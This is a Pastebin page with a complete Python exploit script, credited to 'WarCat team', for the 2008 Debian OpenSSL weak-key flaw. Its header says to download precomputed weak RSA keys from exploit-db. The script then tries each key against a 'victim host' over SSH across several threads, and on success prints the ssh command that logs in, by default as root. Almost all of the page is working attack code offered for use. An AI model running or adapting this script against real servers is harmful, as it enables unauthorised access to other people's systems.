API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Apr 17th, 2014
47
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.61 KB | None | 0 0
raw download clone embed print report
  1. #!/bin/python
  2. # This program is free software; you can redistribute it and/or modify
  3. # it under the terms of the GNU General Public License as published by
  4. # the Free Software Foundation; either version 2 of the License, or
  5. # (at your option) any later version.
  6. #
  7. # This program is distributed in the hope that it will be useful,
  8. # but WITHOUT ANY WARRANTY; without even the implied warranty of
  9. # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
  10. # GNU General Public License for more details.
  11. #
  12. # You should have received a copy of the GNU General Public License
  13. # along with this program; if not, write to the Free Software
  14. # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
  15. # MA 02110-1301, USA.
  16. ############################################################################
  17. # Autor: hitz - WarCat team (warcat.no-ip.org)
  18. # Collaborator: pretoriano
  19. #
  20. # 1. Download http://www.exploit-db.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2
  21. #
  22. # 2. Extract it to a directory
  23. #
  24. # 3. Execute the python script
  25. # - something like: python exploit.py /home/hitz/keys 192.168.1.240 root 22 5
  26. # - execute: python exploit.py (without parameters) to display the help
  27. # - if the key is found, the script shows something like that:
  28. # Key Found in file: ba7a6b3be3dac7dcd359w20b4afd5143-1121
  29. # Execute: ssh -lroot -p22 -i /home/hitz/keys/ba7a6b3be3dac7dcd359w20b4afd5143-1121 192.168.1.240
  30. ############################################################################
  31.  
  32.  
  33. import Queue
  34. import os
  35. import string
  36. import time
  37. from threading import Thread
  38. import sys
  39.  
  40. #This class only has a boolean, which will be True if some thread find the key
  41. class End():
  42. def __init__(self):
  43. self.end = False
  44.  
  45. def Finish(self):
  46. self.end = True
  47.  
  48. def GetEnd(self):
  49. return self.end
  50.  
  51.  
  52. #This is the thread class
  53. class Connection(Thread):
  54. def __init__(self,QueueDir,TheEnd,dir,host,user,port='22'):
  55. Thread.__init__(self)
  56. self.QueueDir = QueueDir
  57. self.TheEnd = TheEnd
  58. self.dir = dir
  59. self.host = host
  60. self.user = user
  61. self.port = port
  62.  
  63. def run(self):
  64. while (not self.TheEnd.GetEnd()) and (not self.QueueDir.empty()):
  65. key = self.QueueDir.get()
  66.  
  67. cmd = 'ssh -l ' + self.user
  68. cmd = cmd + ' -p ' + self.port
  69. cmd = cmd + ' -o PasswordAuthentication=no'
  70. cmd = cmd + ' -i ' + self.dir + '/' + key
  71. cmd = cmd + ' ' + self.host + ' exit; echo $?'
  72.  
  73. pin,pout,perr = os.popen3(cmd, 'r')
  74. pin.close()
  75.  
  76. #To debug descoment the next line. This will show the errors reported by ssh
  77. #print perr.read()
  78.  
  79. if pout.read().lstrip().rstrip() == '0':
  80. self.TheEnd.Finish()
  81. print ''
  82. print 'Key Found in file: '+ key
  83. print 'Execute: ssh -l%s -p%s -i %s/%s %s' %(self.user,self.port,self.dir,key,self.host)
  84. print ''
  85.  
  86. print '\n-OpenSSL Debian exploit- by ||WarCat team|| warcat.no-ip.org'
  87.  
  88. if len(sys.argv) < 4:
  89. print './exploit.py <dir> <host> <user> [[port] [threads]]'
  90. print ' <dir>: Path to SSH privatekeys (ex. /home/john/keys) without final slash'
  91. print ' <host>: The victim host'
  92. print ' <user>: The user of the victim host'
  93. print ' [port]: The SSH port of the victim host (default 22)'
  94. print ' [threads]: Number of threads (default 4) Too big numer is bad'
  95.  
  96. sys.exit(1)
  97.  
  98. dir = sys.argv[1]
  99. host = sys.argv[2]
  100. user = sys.argv[3]
  101.  
  102. if len(sys.argv) <= 4:
  103. port='22'
  104. threads=4
  105. else:
  106. if len(sys.argv) <=5:
  107. port=sys.argv[4]
  108. threads = 4
  109.  
  110. else:
  111. port=sys.argv[4]
  112. threads = sys.argv[5]
  113.  
  114. ListDir = os.listdir(dir)
  115. QueueDir=Queue.Queue()
  116. TheEnd = End()
  117.  
  118. for i in range(len(ListDir)):
  119. if ListDir[i].find('.pub') == -1:
  120. QueueDir.put(ListDir[i])
  121.  
  122. initsize = QueueDir.qsize()
  123. tested = 0
  124.  
  125. for i in range(0,int(threads)):
  126. Connection(QueueDir,TheEnd,dir,host,user,port).start()
  127.  
  128.  
  129. while (not TheEnd.GetEnd()) and (not QueueDir.empty()):
  130. time.sleep(5)
  131. actsize = QueueDir.qsize()
  132. speed = (initsize - tested - actsize)/5
  133. tested = initsize - actsize
  134.  
  135. print 'Tested %i keys | Remaining %i keys | Aprox. Speed %i/sec' %(tested,actsize,speed)
  136.  
  137. # milw0rm.com [2008-06-01]
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!